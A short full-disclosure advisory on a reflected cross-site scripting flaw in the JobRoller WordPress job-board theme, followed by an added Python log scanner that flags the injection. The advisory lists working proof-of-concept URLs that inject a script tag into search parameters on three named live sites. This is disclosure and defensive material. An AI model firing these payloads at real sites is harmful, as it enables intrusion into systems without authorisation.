#Reflected XSS in JobRoller - job board for WordPress
#Vendor: appthemes.com/themes/jobroller/
#Type of report: Full Disclosure (vendor informed at the same time)
Example PoC:
www.nextjobfind.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
pracait.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
myworknet.com/wp/?s=tester&location=%27%22%3E&ptype=job_listing&latitude=%27%22%3E&longitude=%27%22%3E&full_address=%27%22%3E%3Cscript%3Ealert%28%22Infern0_%22%29%3C/script%3E&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5%27%22%3E
Versions <=1.6.3 seem to be affected (last link).
Versions <=1.5.1 are definitely affected.
Regards,
Dawid `Infern0_` Balut
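
Added example, not part of the original advisory or the theme's code: a log check site operators can use to spot requests that put markup into the search parameters shown in the PoC. The parameter names come from the PoC URLs; the numeric/free-text split, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names as they appear in the advisory's PoC query string.
# Assumption: the geo parameters only ever carry plain decimal numbers.
NUMERIC = {"latitude", "longitude", "radius", "north_east_lng",
           "south_west_lng", "north_east_lat", "south_west_lat"}
FREE_TEXT = {"s", "location", "full_address", "ptype"}

NUMBER_RE = re.compile(r"-?\d+(\.\d+)?")
# Apostrophe is left out on purpose: place names such as O'Fallon contain it.
MARKUP_RE = re.compile(r'[<>"]')
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return sorted names of search parameters whose decoded value is
    non-numeric where a number is expected, or contains markup characters."""
    hits = set()
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC:
            if value and not NUMBER_RE.fullmatch(value):
                hits.add(name)
        elif name in FREE_TEXT and MARKUP_RE.search(value):
            hits.add(name)
    return sorted(hits)


def scan(log_lines):
    """Return (client_ip, [parameter names]) for each flagged request."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                findings.append((line.split()[0], hits))
    return findings


# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?s=tester&location=%27%22%3E&ptype=job_listing&latitude=%27%22%3E&longitude=%27%22%3E&full_address=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&north_east_lng=&radius=5%27%22%3E HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /?s=nurse&location=Leeds&ptype=job_listing&latitude=53.8008&longitude=-1.5491&full_address=Leeds%2C+UK&radius=5 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, "suspicious search parameters:", ", ".join(params))
```

A hit only shows that such a request reached the server; the fix itself is output escaping of these parameters in the theme.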